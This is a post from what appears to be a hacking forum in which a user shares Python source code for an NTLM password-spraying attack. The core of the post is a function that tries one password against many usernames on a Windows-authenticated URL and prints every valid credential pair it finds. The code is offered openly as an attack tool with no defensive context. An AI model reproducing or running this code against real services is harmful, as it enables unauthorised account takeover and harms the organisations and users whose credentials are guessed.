• We just launched and are currently in beta. Join us as we build and grow the community.

$$$$ NTLM Password Spraying PYTHON Source Codes.... $$$$

Khanii

Waifu Protector
K Rep
0
0
0
Rep
0
K Vouches
0
0
0
Vouches
0
Posts
78
Likes
107
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
NTLM Password Spraying Source Codes....
Link:
def password_spray(self, password, url):
print ("[*] Starting passwords spray attack using the following password: " + password)
#Reset valid credential counter
count = 0
#Iterate through all of the possible usernames
for user in self.users:
#Make a request to the website and attempt Windows Authentication
response = requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password))
#Read status code of response to determine if authentication was successful
if (response.status_code == self.HTTP_AUTH_SUCCEED_CODE):
print ("[+] Valid credential pair found! Username: " + user + " Password: " + password)
count += 1
continue
if (self.verbose):
if (response.status_code == self.HTTP_AUTH_FAILED_CODE):
print ("[-] Failed login with Username: " + user)
print ("[*] Password spray attack completed, " + str(count) + " valid credential pairs found")
 

452,292

323,340

323,349

Top